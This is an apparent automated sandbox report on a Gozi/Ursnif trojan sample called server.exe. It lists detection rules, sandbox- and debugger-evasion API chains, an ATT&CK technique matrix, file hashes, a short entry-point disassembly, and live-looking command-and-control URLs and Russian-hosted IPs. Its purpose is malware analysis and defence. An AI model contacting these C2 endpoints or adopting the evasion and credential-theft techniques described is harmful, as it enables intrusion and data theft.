      Source: 00000000.00000003.459783978.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.460044843.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.460044843.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 3536, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 3536, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02CE16DF0_2_02CE16DF
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02CE1D8A0_2_02CE1D8A
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02CE832C0_2_02CE832C
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,0_2_0040110B
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401459 NtMapViewOfSection,0_2_00401459
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02CE421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_02CE421F
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02CE8551 NtQueryVirtualMemory,0_2_02CE8551
      Source: server.exeVirustotal: Detection: 55%
      Source: server.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\server.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/2
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02CE30D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_02CE30D5
      Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\nexonanil\dituvap\gekezatuz82\povosozuwozob16\saleni90 c.pdb source: server.exe

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02CE831B push ecx; ret 0_2_02CE832B
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02CE7F30 push ecx; ret 0_2_02CE7F39
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02E50F9B push 8B8751D0h; retf 0_2_02E50FA0
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02E56227 push edi; ret 0_2_02E56228
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: Yara matchFile source: 00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.460026895.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459923049.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459750539.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459944740.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459896893.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459783978.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.460044843.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 3536, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\server.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
      Source: C:\Users\user\Desktop\server.exe TID: 5536Thread sleep count: 31 > 30Jump to behavior
      Source: C:\Users\user\Desktop\server.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
      Source: C:\Users\user\Desktop\server.exeAPI call chain: ExitProcess graph end node
      Source: server.exe, 00000000.00000002.568866270.0000000002EB8000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: server.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPW

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\server.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02E4E470 push dword ptr fs:[00000030h]0_2_02E4E470
      Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02CE3BD3 cpuid 0_2_02CE3BD3
      Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_004015B0
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401D68
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02CE3BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_02CE3BD3

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.460026895.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459923049.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459750539.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459944740.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459896893.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459783978.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.460044843.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 3536, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.460026895.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459923049.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459750539.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459944740.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459896893.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459783978.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.460044843.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 3536, type: MEMORYSTR
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Windows Management Instrumentation
      Path InterceptionPath Interception11
      Virtualization/Sandbox Evasion
      1
      Input Capture
      1
      System Time Discovery
      Remote Services1
      Input Capture
      Exfiltration Over Other Network Medium2
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      Data Encrypted for Impact
      Default Accounts12
      Native API
      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Obfuscated Files or Information
      LSASS Memory11
      Security Software Discovery
      Remote Desktop Protocol11
      Archive Collected Data
      Exfiltration Over Bluetooth1
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
      Software Packing
      Security Account Manager11
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
      Process Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer12
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      Account Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
      System Owner/User Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      Remote System Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
      System Information Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      server.exe55%VirustotalBrowse
      server.exe100%Joe Sandbox ML
      No Antivirus matches
      SourceDetectionScannerLabelLinkDownload
      0.2.server.exe.2ce0000.2.unpack100%AviraHEUR/AGEN.1245293Download File
      0.2.server.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://5.44.43.17/drew/4g9Pq9f8yl_2BqLNg_2F/GsF66vmh2Tpicwg37xs/IeFtLuJ4Vgq9WwijsD2n0d/Bquuj0kLXj_2B0%Avira URL Cloudsafe
      http://5.44.43.17/0%Avira URL Cloudsafe
      http://31.41.44.108/drew/FJTU0wze8Hjvm_2BHka/T78K158O_2Fv5farATygbE/7uQJsjJeUPlO2/LBUhKSJa/o4FD53ecF0%Avira URL Cloudsafe
      http://5.44.43.17/98D0-4585-A1ED-B2838757AE1B0%Avira URL Cloudsafe
      http://5.44.43.17/-A1ED-B2838757AE1B0%Avira URL Cloudsafe
      http://5.44.43.17/drew/4g9Pq9f8yl_2BqLNg_2F/GsF66vmh2Tpicwg37xs/IeFtLuJ4Vgq9WwijsD2n0d/Bquuj0kLXj_2B/g9_2Bh6q/18_2Bd4Y19mjSIvebXNvx4u/IKPQjubsH_/2BffqZNZA6lqyycQo/1wN43eb54EKC/UkUZJXRrn4j/R3115Fw4Czb8SK/xar7XimyyrkEE9m9c0UP0/1KSNpQlordpxo1Ws/_2B6QH8tLTSTNrP/6dO_2BuUeu5EmaGfZI/wcja66YPQ/Z_2B4nfOuMl7_2BnQaBq/8KUwwwam.jlk0%Avira URL Cloudsafe
      http://31.41.44.108/320%Avira URL Cloudsafe
      http://5.44.43.17/1%VirustotalBrowse
      http://31.41.44.108/0%Avira URL Cloudsafe
      http://31.41.0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      checklist.skype.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://5.44.43.17/drew/4g9Pq9f8yl_2BqLNg_2F/GsF66vmh2Tpicwg37xs/IeFtLuJ4Vgq9WwijsD2n0d/Bquuj0kLXj_2B/g9_2Bh6q/18_2Bd4Y19mjSIvebXNvx4u/IKPQjubsH_/2BffqZNZA6lqyycQo/1wN43eb54EKC/UkUZJXRrn4j/R3115Fw4Czb8SK/xar7XimyyrkEE9m9c0UP0/1KSNpQlordpxo1Ws/_2B6QH8tLTSTNrP/6dO_2BuUeu5EmaGfZI/wcja66YPQ/Z_2B4nfOuMl7_2BnQaBq/8KUwwwam.jlktrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://5.44.43.17/drew/4g9Pq9f8yl_2BqLNg_2F/GsF66vmh2Tpicwg37xs/IeFtLuJ4Vgq9WwijsD2n0d/Bquuj0kLXj_2Bserver.exe, 00000000.00000002.568866270.0000000002EB8000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.568866270.0000000002EAC000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://5.44.43.17/server.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://5.44.43.17/-A1ED-B2838757AE1Bserver.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://31.41.44.108/drew/FJTU0wze8Hjvm_2BHka/T78K158O_2Fv5farATygbE/7uQJsjJeUPlO2/LBUhKSJa/o4FD53ecFserver.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.568866270.0000000002EAC000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://5.44.43.17/98D0-4585-A1ED-B2838757AE1Bserver.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://31.41.44.108/server.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://31.41.44.108/32server.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://31.41.server.exe, 00000000.00000002.568929049.00000000049BC000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        low
        http://checklist.skype.com/drew/RCiQyn59/Gow2vU3BObfVI7A8uLXOgnm/720Rvxrh27/9sCisgCQ1dbhwi3H4/XmYN2Iserver.exe, 00000000.00000002.568866270.0000000002EAC000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          5.44.43.17
          unknownRussian Federation
          202423MGNHOST-ASRUtrue
          31.41.44.108
          unknownRussian Federation
          56577ASRELINKRUfalse
          Joe Sandbox Version:37.0.0 Beryl
          Analysis ID:827054
          Start date and time:2023-03-15 14:38:10 +01:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 6m 12s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample file name:server.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@1/0@1/2
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 56.7% (good quality ratio 55.1%)
          • Quality average: 82%
          • Quality standard deviation: 26.5%
          HCA Information:
          • Successful, ratio: 95%
          • Number of executed functions: 41
          • Number of non-executed functions: 33
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          5.44.43.17marzo.txt.urlGet hashmaliciousUrsnifBrowse
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ASRELINKRUserver.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.92
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.92
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.85
            lQj2udnlAj.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.85
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.85
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.63
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.63
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.63
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.63
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.63
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.63
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.63
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.63
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.63
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.63
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.63
            Informazione_Azienda.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.33
            server.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.33
            dow.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.33
            1.exeGet hashmaliciousUrsnifBrowse
            • 31.41.44.33
            MGNHOST-ASRUmarzo.txt.urlGet hashmaliciousUrsnifBrowse
            • 5.44.43.17
            login.dllGet hashmaliciousUrsnifBrowse
            • 194.116.163.130
            login.dllGet hashmaliciousUrsnifBrowse
            • 194.116.163.130
            Informazion.exeGet hashmaliciousUrsnif, zgRATBrowse
            • 193.0.178.157
            47gcdr4nlI.exeGet hashmaliciousDanaBotBrowse
            • 185.142.98.118
            fx1sA5uEA6.dllGet hashmaliciousUrsnifBrowse
            • 45.128.184.132
            l86WZsZuFv.dllGet hashmaliciousUrsnifBrowse
            • 45.128.184.132
            ksbpxIpTBF.exeGet hashmaliciousUrsnifBrowse
            • 45.128.184.132
            sYYcKwk74U.exeGet hashmaliciousUrsnifBrowse
            • 45.128.184.132
            8cM8CHCI8G.exeGet hashmaliciousUrsnifBrowse
            • 45.128.184.132
            RhVUkWJKWL.exeGet hashmaliciousUrsnifBrowse
            • 45.128.184.132
            94nN5FYKPp.exeGet hashmaliciousUrsnifBrowse
            • 45.128.184.132
            5wh5H82cKl.exeGet hashmaliciousUrsnifBrowse
            • 45.128.184.132
            readme.dllGet hashmaliciousUrsnif CryptOneBrowse
            • 45.128.184.132
            readme.dllGet hashmaliciousUrsnif CryptOneBrowse
            • 45.128.184.132
            readme.dllGet hashmaliciousUrsnif CryptOneBrowse
            • 45.128.184.132
            status.dllGet hashmaliciousUrsnif CryptOneBrowse
            • 45.128.184.132
            readme.dllGet hashmaliciousUrsnif CryptOneBrowse
            • 45.128.184.132
            status.dllGet hashmaliciousUrsnifBrowse
            • 45.128.184.132
            IWmwEgXhMK.exeGet hashmaliciousUrsnifBrowse
            • 45.128.184.132
            No context
            No context
            No created / dropped files found
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.191671893434653
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:server.exe
            File size:316928
            MD5:768928d17e8d3489407b540dbad4a770
            SHA1:8ce488487dc133ef92dec536608b0c1056a3e16a
            SHA256:5d0be9aaad980137d68677d7ef3758d9ce7a4e2d170df0abee803f64b14dcd67
            SHA512:0827c24c00d00ce10e5f6732d29efed6a051eafcc9aeb6a7c69d5b89615f7eb49b5333b6d5614613b0e64f792b3ff6d850108eb736eb1169eccbda09be3ac869
            SSDEEP:3072:3SVRi5/ELPnpP0SbcTS7ipobb2m+9vAh2QlNlfkkVjJ:Cri5ELBcV3qbAIn5NJ
            TLSH:CC642A1393E1BD85E96A8B729E1ED6F8761EF690CE0D776922289F1F04B1076C263710
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..@[..@[..@[..^.>.`[..^./.T[..^.9.#[..g...I[..@[..3[..^.0.A[..^...A[..^.+.A[..Rich@[..........PE..L.....^b...................
            Icon Hash:a4a4a08484b4a4e0
            Entrypoint:0x404f66
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:TERMINAL_SERVER_AWARE
            Time Stamp:0x625E87B1 [Tue Apr 19 09:58:09 2022 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:0
            File Version Major:5
            File Version Minor:0
            Subsystem Version Major:5
            Subsystem Version Minor:0
            Import Hash:25b97b20ea5f74ae1a1939bb76680477
            Instruction
            call 00007FBBDCB55A6Bh
            jmp 00007FBBDCB5393Eh
            mov edi, edi
            push ecx
            mov dword ptr [ecx], 0040125Ch
            call 00007FBBDCB55AEEh
            pop ecx
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            push esi
            mov esi, ecx
            call 00007FBBDCB53AA8h
            test byte ptr [ebp+08h], 00000001h
            je 00007FBBDCB53AC9h
            push esi
            call 00007FBBDCB53D75h
            pop ecx
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            mov edi, edi
            push ebp
            mov ebp, esp
            mov ecx, dword ptr [ebp+08h]
            push ebx
            xor ebx, ebx
            push esi
            push edi
            cmp ecx, ebx
            je 00007FBBDCB53AC9h
            mov edi, dword ptr [ebp+0Ch]
            cmp edi, ebx
            jnbe 00007FBBDCB53ADDh
            call 00007FBBDCB55D4Eh
            push 00000016h
            pop esi
            mov dword ptr [eax], esi
            push ebx
            push ebx
            push ebx
            push ebx
            push ebx
            call 00007FBBDCB55CD7h
            add esp, 14h
            mov eax, esi
            jmp 00007FBBDCB53AF2h
            mov esi, dword ptr [ebp+10h]
            cmp esi, ebx
            jne 00007FBBDCB53AC6h
            mov byte ptr [ecx], bl
            jmp 00007FBBDCB53A9Ch
            mov edx, ecx
            mov al, byte ptr [esi]
            mov byte ptr [edx], al
            inc edx
            inc esi
            cmp al, bl
            je 00007FBBDCB53AC5h
            dec edi
            jne 00007FBBDCB53AB5h
            cmp edi, ebx
            jne 00007FBBDCB53AD2h
            mov byte ptr [ecx], bl
            call 00007FBBDCB55D13h
            push 00000022h
            pop ecx
            mov dword ptr [eax], ecx
            mov esi, ecx
            jmp 00007FBBDCB53A83h
            xor eax, eax
            pop edi
            pop esi
            pop ebx
            pop ebp
            ret
            push 0000000Ch
            push 0040EEC0h
            call 00007FBBDCB54DF4h
            and dword ptr [ebp-1Ch], 00000000h
            mov esi, dword ptr [ebp+08h]
